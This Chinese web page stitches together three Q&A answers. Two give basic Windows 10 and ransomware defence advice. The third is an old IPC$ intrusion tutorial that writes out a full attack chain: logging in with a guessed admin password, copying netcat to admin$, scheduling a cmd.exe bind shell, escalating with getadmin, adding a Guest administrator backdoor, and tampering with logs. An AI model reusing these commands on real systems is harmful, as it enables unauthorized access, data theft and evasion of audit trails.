windows之家1.win10会被黑客攻击吗
个人电脑由于入侵价值普遍偏低,所以一般黑客会攻击服务器,那样会更容易获取利益。但个人电脑也不排除被黑客恶意攻击的可能性。其实电脑系统并不会让黑客攻击的可能性改变,而是在电脑的安全性上有所体现。并且,个人电脑被入侵的主要方式是木马和病毒,一般不会有黑客专门入侵个人电脑。
Windows10系统如果坚持更新到最新版本的话几乎是不用担心黑客入侵。其实个人电脑一般情况下本便比服务器更难以入侵。再加上Window10自带的安全软件,对于黑客入侵是无需担忧的。
不过个人认为,Windows10上的安全软件有些不尽人意。答主可以考虑使用一些免费、付费的杀毒软件。诸如腾讯的电脑管家、360安全卫士之类的。但国产的免费杀毒软件几乎都有些广告满天飞,软件捆版的问题。在这里我推荐火绒。火绒虽然可能算不上国产骄傲,但国产良心是确实的。这个可以又自己的使用感受得出,我就不再赘言了。
愿各位能无忧地使用电脑,不要相信某某漏洞刷某某的广告!
2.勒索病毒容易入侵win10哪些端口
大部分系统均起作用,win10也不例外,但win10的安全度比较高,比较安全!此次 永恒之蓝 勒索病毒事件大部分被入侵的都是低级系统,微软已经不提供安全更新的系统。
如果可以建议使用win10比较安全!但主要是要自己做好防御措施防御方法:1.不随意打开/点击/进入/下载安装 不明 网页/链接/网页/软件等(这是最基础的)2.更新安全软件至最新版本,专门应对此次事件的最新版本,要可靠的安全软件(推荐用360安全卫士)3.到微软官网下载最新补丁,或是用360下载最新的补丁!4.这段时间最好每天都木马查杀,漏洞检测。5.也是很重要的一点,把445端口(最重要的),135,137,138,139等危险端口都封闭,关闭方法自己百度,随便一查就会有(最好选择最近的发布文章)6.使用360反勒索服务7.准备好一块系统重装光盘或U盘,以防万一。
8.也要准备好360新更新的工具 文件解密 也是以防万一。9.这一点是最重要,最重要,最重要的,那就是 防火墙 必须要开,(是必须开,而不是可以开,也不是推荐开),不然即使你申请360反勒索赔理,他也绝对不会赔给你的10.如果不闲麻烦可以开机时断掉网线,开机用杀毒软件检查无异常后在重新连网。
3.具体的入侵电脑的方法
IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。
如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。
本文欢迎非商业性转载,但请保持文章完整性并注明出处!:-) IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。
好了,废话少说,现在进入主题。 如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。
现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。 好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。
进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。
F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F:\》copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。
F:\》net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。 F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业,其作业 ID = 0 F:\》telnet 139.223.200.xxx 1234 上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。
这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F:\》netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。
如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。
F:\》copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F:\》copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。
其次,在远程主机运行下面的命令。 C:\WINNT\system32》getadmin 如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-) 那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。
我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。
其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。
作完了你要做的事,不要忘了做个后门。 C:\WINNT\system32》net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32》net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。
现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢? 最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。
NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。
转载请注明出处windows之家 » 能入侵win10电脑吗